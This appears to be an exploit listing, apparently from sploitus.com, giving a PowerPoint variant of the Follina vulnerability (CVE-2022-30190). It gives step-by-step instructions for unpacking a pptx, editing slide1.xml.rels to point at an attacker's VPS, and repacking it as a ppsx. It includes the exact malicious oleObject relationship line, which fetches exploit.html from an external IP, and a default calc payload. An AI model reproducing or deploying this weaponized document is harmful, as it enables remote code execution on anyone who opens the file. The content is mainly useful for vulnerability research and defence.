Share
## https://sploitus.com/exploit?id=E6B6EDFD-3B78-58CA-B507-093047F89BB1
# CVE-2022-30190(Follina)-PowerPoint-Version

This is CVE-2022-30190(follina) on powerpoint version



Modify the suffix of the file to 'pptx' and unzip the file, you can edit `\ppt\slides\_rels\slide1.xml.rels` and replace to your vps ip:port like this, then compress them as the same way and change the suffix to 'ppsx'. The default payload is to execute the `calc`.



```
<Relationship TargetMode="External" Id="rId3"  Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"  Target="mhtml:http://114.114.114.114:80/exploit.html!x-usc:http://114.114.114.114:80/exploit.html"/>
```



refer: https://github.com/chvancooten/follina.py